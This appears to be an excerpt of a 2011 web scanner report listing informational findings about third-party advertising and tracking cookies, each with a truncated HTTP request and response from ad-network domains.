HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: policyref="http://js Cache-Control: no-cache Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver Set-Cookie: rsiPus_IH_7=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver Set-Cookie: rsiPus_vQ_l=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver Set-Cookie: rsiPus_BLx4=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: rsiPus_IH_7=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: rsiPus_vQ_l=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: rsiPus_BLx4=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: rsiPus_c7op="MLuBMx5 Set-Cookie: rsi_us_1000000="pUMd5U Content-Type: application/x-javascript Vary: Accept-Encoding Date: Mon, 16 May 2011 01:26:11 GMT Content-Length: 778 function rsi_img(p,u,c){if(u i.src=u;p[p.length]=i;}} function rsi_simg(p,s,i){if(i<s ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://adserver.veruta |
Path: | /track.fcgi |
GET /track.fcgi?merchantid Host: adserver.veruta.com Proxy-Connection: keep-alive Referer: http://t.p.mybuys.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ueid=1461734246 |
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Mon, 16 May 2011 01:43:23 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding Cache-Control: max-age=0, no-store, must-revalidate, no-cache Expires: Thu, 01-Jan-1970 00:00:00 GMT P3P: policyref="http://www Pragma: no-cache Set-cookie: ueid=1461734246 Set-cookie: cmid=20772879917; expires=Tue, 15-May-2012 01:43:23 GMT; path=/; domain=.veruta.com; Content-Length: 65 <html><head><title>< |
Severity: | Information |
Confidence: | Certain |
Host: | http://ak1.abmr.net |
Path: | /is/images3.pacsun.com |
GET /is/images3.pacsun.com?U= Host: ak1.abmr.net Proxy-Connection: keep-alive Referer: http://shop.pacsun.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: 01AI=2-2-9FDE8D6FF0B |
HTTP/1.1 302 Moved Temporarily Content-Length: 0 Location: http://images3.pacsun.com Expires: Mon, 16 May 2011 01:43:57 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 16 May 2011 01:43:57 GMT Connection: close Set-Cookie: 01AI=2-2-0668EB3294B P3P: policyref="http://www |
Severity: | Information |
Confidence: | Certain |
Host: | http://ak1.abmr.net |
Path: | /is/tag.admeld.com |
GET /is/tag.admeld.com?U=/ad Host: ak1.abmr.net Proxy-Connection: keep-alive Referer: http://www.telegraph.co User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: 01AI=2-2-3389AF6B211 |
HTTP/1.1 302 Moved Temporarily Content-Length: 0 Location: http://tag.admeld.com/ad Expires: Mon, 16 May 2011 01:19:52 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 16 May 2011 01:19:52 GMT Connection: close Set-Cookie: 01AI=2-2-0F97FF17A6C P3P: policyref="http://www |
Severity: | Information |
Confidence: | Certain |
Host: | http://ak1.abmr.net |
Path: | /is/tag.contextweb.com |
GET /is/tag.contextweb.com?U= Host: ak1.abmr.net Proxy-Connection: keep-alive Referer: http://optimized-by User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: 01AI=2-2-3389AF6B211 |
HTTP/1.1 302 Moved Temporarily Content-Length: 0 Location: http://tag.contextweb.com Expires: Mon, 16 May 2011 01:19:51 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 16 May 2011 01:19:51 GMT Connection: close Set-Cookie: 01AI=2-2-8AFA4574C23 P3P: policyref="http://www |
Severity: | Information |
Confidence: | Certain |
Host: | http://ak1.abmr.net |
Path: | /is/www.imiclk.com |
GET /is/www.imiclk.com?U=/cgi Host: ak1.abmr.net Proxy-Connection: keep-alive Referer: http://www.armaniexchange User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: 01AI=2-2-C76F5B44DF8 |
HTTP/1.1 302 Moved Temporarily Content-Length: 0 Location: http://www.imiclk.com/cgi Expires: Mon, 16 May 2011 01:42:58 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 16 May 2011 01:42:58 GMT Connection: close Set-Cookie: 01AI=2-2-5E66A717ADC P3P: policyref="http://www |
Severity: | Information |
Confidence: | Certain |
Host: | http://analytics |
Path: | /analytics/v2/image.svc |
GET /analytics/v2/image.svc Host: analytics.apnewsregistry Proxy-Connection: keep-alive Referer: http://www.observertoday User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 303 See Other Cache-Control: private Date: Mon, 16 May 2011 01:19:41 GMT Location: http://d503lhn9b3612 P3P: CP="NOI PSAo OUR IND COM NAV STA" Server: Microsoft-IIS/7.0 Set-Cookie: uciv1=2ec34539-fad4-4d8a X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Content-Length: 0 Connection: keep-alive |
Severity: | Information |
Confidence: | Certain |
Host: | http://b.scorecardre |
Path: | /b |
GET /b?c1=2&c2=6035753&rn Host: b.scorecardresearch.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: image/png,image/*;q=0.8,* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://pastebin.com Cookie: UID=7278cea-24.143.206.58 |
HTTP/1.1 204 No Content Content-Length: 0 Date: Sun, 15 May 2011 21:31:00 GMT Connection: close Set-Cookie: UID=7278cea-24.143.206.58 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC" Expires: Mon, 01 Jan 1990 00:00:00 GMT Pragma: no-cache Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate Server: CS |
Severity: | Information |
Confidence: | Certain |
Host: | http://b.scorecardre |
Path: | /r |
GET /r?c2=6035140&d.c=gif&d.o Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://disneycruise User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UID=64dfc632-184.84.247 |
HTTP/1.1 200 OK Content-Length: 43 Content-Type: image/gif Date: Mon, 16 May 2011 01:20:47 GMT Connection: close Set-Cookie: UID=64dfc632-184.84.247 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC" Expires: Mon, 01 Jan 1990 00:00:00 GMT Pragma: no-cache Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate Server: CS GIF89a.............!..... |
Severity: | Information |
Confidence: | Certain |
Host: | http://bh.contextweb.com |
Path: | /bh/rtset |
GET /bh/rtset?do=add&pid Host: bh.contextweb.com Proxy-Connection: keep-alive Referer: http://d.xp1.ru4.com/meta User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: V=8vciuQJMXXJY; cwbh1=2532%3B06%2F14 |
HTTP/1.1 200 OK Server: Sun GlassFish Enterprise Server v2.1 CW-Server: cw-web83 Cache-Control: no-cache, no-store Set-Cookie: V=8vciuQJMXXJY; Domain=.contextweb.com; Expires=Thu, 10-May-2012 01:19:51 GMT; Path=/ Set-Cookie: pb_rtb_ev=1:531292.AG Content-Type: image/gif Date: Mon, 16 May 2011 01:19:50 GMT P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT" Content-Length: 49 GIF89a................... |
Severity: | Information |
Confidence: | Certain |
Host: | http://c7.zedo.com |
Path: | /utils/ecSet.js |
GET /utils/ecSet.js?v=PI Host: c7.zedo.com Proxy-Connection: keep-alive Referer: http://www.observertoday User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ZEDOIDA=lYrOTcGt89Yz |
HTTP/1.1 200 OK Server: ZEDO 3G Content-Length: 1 Content-Type: application/x-javascript Set-Cookie: PI=h1145373Za940831Z ETag: "637af42d-1f5-47f291 Vary: Accept-Encoding P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=6912 Date: Mon, 16 May 2011 01:30:23 GMT Connection: close |
Severity: | Information |
Confidence: | Certain |
Host: | http://cw-m.d.chango.com |
Path: | /m/cw |
GET /m/cw HTTP/1.1 Host: cw-m.d.chango.com Proxy-Connection: keep-alive Referer: http://www.telegraph.co User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 302 Found Content-Length: 0 Server: Chango RTB Server Location: http://bh.contextweb.com Pragma: no-cache Cache-Control: no-cache, no-store, max-age=0, must-revalidate P3P: policyref="http://as Content-Type: text/html; charset=UTF-8 Set-Cookie: _t=9ed3f2f2-7f5a-11e0 Set-Cookie: _i_cw=1; Domain=chango.com; expires=Thu, 30 Jun 2011 01:20:00 GMT; Path=/ Connection: close |
Severity: | Information |
Confidence: | Certain |
Host: | http://d.audienceiq.com |
Path: | /r/dm/mkt/44/mpid//mpuid |
GET /r/dm/mkt/44/mpid//mpuid Host: d.audienceiq.com Proxy-Connection: keep-alive Referer: http://cdn.turn.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV" Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0 Pragma: no-cache Set-Cookie: uid=3133143063234146036; Domain=.audienceiq.com; Expires=Sat, 12-Nov-2011 01:20:12 GMT; Path=/ Content-Type: image/gif Content-Length: 43 Date: Mon, 16 May 2011 01:20:11 GMT GIF89a.............!..... |
Severity: | Information |
Confidence: | Certain |
Host: | http://d.audienceiq.com |
Path: | /r/dm/mkt/73/mpid//mpuid |
GET /r/dm/mkt/73/mpid//mpuid Host: d.audienceiq.com Proxy-Connection: keep-alive Referer: http://cdn.turn.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV" Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0 Pragma: no-cache Set-Cookie: uid=7367907040977902081; Domain=.audienceiq.com; Expires=Sat, 12-Nov-2011 01:20:12 GMT; Path=/ Content-Type: image/gif Content-Length: 43 Date: Mon, 16 May 2011 01:20:12 GMT GIF89a.............!..... |
Severity: | Information |
Confidence: | Certain |
Host: | http://d.audienceiq.com |
Path: | /r/du/id/L2NzaWQvNS9 |
GET /r/du/id/L2NzaWQvNS9 Host: d.audienceiq.com Proxy-Connection: keep-alive Referer: http://cdn.turn.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV" Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0 Pragma: no-cache Set-Cookie: uid=3598886902647137246; Domain=.audienceiq.com; Expires=Sat, 12-Nov-2011 01:20:12 GMT; Path=/ Content-Type: image/gif Content-Length: 43 Date: Mon, 16 May 2011 01:20:11 GMT GIF89a.............!..... |
Severity: | Information |
Confidence: | Certain |
Host: | http://d.mediabrandsww |
Path: | /r/dm/mkt/3/mpid//mpuid |
GET /r/dm/mkt/3/mpid//mpuid Host: d.mediabrandsww.com Proxy-Connection: keep-alive Referer: http://cdn.turn.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV" Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0 Pragma: no-cache Set-Cookie: uid=2614175914018475511; Domain=.mediabrandsww.com Content-Type: image/gif Content-Length: 43 Date: Mon, 16 May 2011 01:20:12 GMT GIF89a.............!..... |
Severity: | Information |
Confidence: | Certain |
Host: | http://d.p-td.com |
Path: | /r/dm/mkt/4/mpid//mpuid |
GET /r/dm/mkt/4/mpid//mpuid Host: d.p-td.com Proxy-Connection: keep-alive Referer: http://cdn.turn.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: uid=8496530639253255806 |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV" Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0 Pragma: no-cache Set-Cookie: uid=8496530639253255806; Domain=.p-td.com; Expires=Sat, 12-Nov-2011 01:20:26 GMT; Path=/ Content-Type: image/gif Content-Length: 43 Date: Mon, 16 May 2011 01:20:26 GMT GIF89a.............!..... |
Severity: | Information |
Confidence: | Certain |
Host: | http://d.p-td.com |
Path: | /r/dm/mkt/4/mpid//mpuid |
GET /r/dm/mkt/4/mpid//mpuid Host: d.p-td.com Proxy-Connection: keep-alive Referer: http://www.telegraph.co User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV" Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0 Pragma: no-cache Set-Cookie: uid=8496530639253255806; Domain=.p-td.com; Expires=Sat, 12-Nov-2011 01:20:08 GMT; Path=/ Content-Type: image/gif Content-Length: 43 Date: Mon, 16 May 2011 01:20:07 GMT GIF89a.............!..... |
Severity: | Information |
Confidence: | Certain |
Host: | http://d.turn.com |
Path: | /r/dd/id/L2NzaWQvMS9 |
GET /r/dd/id/L2NzaWQvMS9 Host: d.turn.com Proxy-Connection: keep-alive Referer: http://cdn.turn.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: pf=UzQBb_qiX6nr0FKOS |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV" Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0 Pragma: no-cache Set-Cookie: uid=4325897289836481830; Domain=.turn.com; Expires=Sat, 12-Nov-2011 01:20:13 GMT; Path=/ Set-Cookie: uid=4325897289836481830; Domain=.turn.com; Expires=Sat, 12-Nov-2011 01:20:13 GMT; Path=/ Content-Type: image/gif Content-Length: 43 Date: Mon, 16 May 2011 01:20:13 GMT GIF89a.............!..... |
Severity: | Information |
Confidence: | Certain |
Host: | http://data.adsrvr.org |
Path: | /map/cookie/contextweb |
GET /map/cookie/contextweb HTTP/1.1 Host: data.adsrvr.org Proxy-Connection: keep-alive Referer: http://optimized-by User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: TDID=d7aeb157-aa7f-4dc8 |
HTTP/1.1 302 Found Cache-Control: private,no-cache, must-revalidate Pragma: no-cache Content-Type: text/html; charset=utf-8 Location: http://bh.contextweb.com Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 Set-Cookie: TDID=d7aeb157-aa7f-4dc8 P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV" Date: Mon, 16 May 2011 01:26:10 GMT Content-Length: 213 Redirecting to: <a href="http://bh ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://disneycruise |
Path: | /reservations/customize |
GET /reservations/customize Host: disneycruise.disney.go Proxy-Connection: keep-alive Referer: http://disneycruise User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: JSESSIONID=854018943 |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache Cache-Control: no-store Content-Type: text/html Vary: Accept-Encoding Date: Mon, 16 May 2011 01:29:41 GMT Set-Cookie: DCL_POOL=1;path=/; Set-Cookie: dcl_i_persistence=H Content-Length: 63930 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <h ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://f.nexac.com |
Path: | /e/a-677/s-2140.xgi |
GET /e/a-677/s-2140.xgi?na Host: f.nexac.com Proxy-Connection: keep-alive Referer: http://www.fingerhut.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: na_tc=Y |
HTTP/1.1 200 OK Expires: Wed Sep 15 09:14:42 MDT 2010 Pragma: no-cache P3P: policyref="http://www Set-Cookie: na_tc=Y; expires=Thu,12-Dec-2030 22:00:00 GMT; domain=.nexac.com; path=/ Set-Cookie: na_id=20110515192708 Set-Cookie: na_lr=20110515; expires=Tue, 17-May-2011 07:33:20 GMT; path=/; domain=.nexac.com Set-Cookie: na_ps=3; expires=Wed, 15-May-2013 01:33:20 GMT; path=/; domain=.nexac.com X-Powered-By: Jigawatts Content-type: text/html Date: Mon, 16 May 2011 01:33:20 GMT Server: lighttpd/1.4.18 Content-Length: 382 <html> <head> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="-1"> </head> <body> <iframe name="__bknsframe" src="http://tags.bluekai ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://https.edge.ru4.com |
Path: | /smartserve/ad |
GET /smartserve/ad?placement Host: https.edge.ru4.com Proxy-Connection: keep-alive Referer: http://www.fingerhut.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: X1ID=AG-00000001389358554 |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: policyref="http://https Pragma: No-Cache Cache-Control: private, no-cache="Set-Cookie" Set-Cookie: ru4.1320=1#2656#0#2656=ad Content-Type: text/html Date: Mon, 16 May 2011 01:38:37 GMT Connection: close document.write("<img src=\"http://ad ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://i.w55c.net |
Path: | /ping_match.gif |
GET /ping_match.gif?ei Host: i.w55c.net Proxy-Connection: keep-alive Referer: http://ads.pubmatic.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: wfivefivec=ea5c094a-3a81 |
HTTP/1.1 302 Found Set-Cookie: wfivefivec=ea5c094a-3a81 X-Version: DataXu Pixel Tracker v3 Cache-Control: private Location: http://image2.pubmatic Server: Jetty(6.1.22) Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a) Connection: keep-alive Content-Length: 0 |
Severity: | Information |
Confidence: | Certain |
Host: | http://ib.adnxs.com |
Path: | /getuid |
GET /getuid?http://r.turn.com Host: ib.adnxs.com Proxy-Connection: keep-alive Referer: http://cdn.turn.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: anj=Kfu=8fG5+^Cxrx)0s]# |
HTTP/1.1 302 Moved Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Tue, 17-May-2011 01:26:02 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=3420415245200633085 Location: http://r.turn.com/r/bd Date: Mon, 16 May 2011 01:26:02 GMT Content-Length: 0 |
Severity: | Information |
Confidence: | Certain |
Host: | http://ib.adnxs.com |
Path: | /getuidnb |
GET /getuidnb?http://image2 Host: ib.adnxs.com Proxy-Connection: keep-alive Referer: http://ads.pubmatic.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: anj=Kfu=8fG5+^Cxrx)0s]# |
HTTP/1.1 302 Moved Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Tue, 17-May-2011 01:19:51 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=3420415245200633085 Location: http://image2.pubmatic Date: Mon, 16 May 2011 01:19:51 GMT Content-Length: 0 |
Severity: | Information |
Confidence: | Certain |
Host: | http://ib.adnxs.com |
Path: | /seg |
GET /seg?add_code=impx-11262 Host: ib.adnxs.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://pastebin.com Cookie: uuid2=2724386019227846218 |
HTTP/1.1 302 Found Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Mon, 16-May-2011 21:34:00 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=2724386019227846218 Set-Cookie: uuid2=2724386019227846218 Set-Cookie: anj=Kfu=8fG7]PE:3F.0s]# Location: http://cms.quantserve.com Date: Sun, 15 May 2011 21:34:00 GMT Content-Length: 0 |
Severity: | Information |
Confidence: | Certain |
Host: | http://id.google.com |
Path: | /verify/EAAAAI5KErmD |
GET /verify/EAAAAI5KErmD Host: id.google.com Proxy-Connection: keep-alive Referer: http://www.google.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: SNID=47=rmeNxjSpRiyo |
HTTP/1.1 200 OK Set-Cookie: NID=47=Lhm6ttn7an2 Cache-Control: no-cache, private, must-revalidate Pragma: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT Content-Type: image/gif Date: Mon, 16 May 2011 00:02:14 GMT Server: zwbk Content-Length: 43 X-XSS-Protection: 1; mode=block GIF89a.............!..... |
Severity: | Information |
Confidence: | Certain |
Host: | http://id.google.com |
Path: | /verify/EAAAAI5WmUe7 |
GET /verify/EAAAAI5WmUe7 Host: id.google.com Proxy-Connection: keep-alive Referer: http://www.google.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: SNID=47=m1F73lFDPpRG |
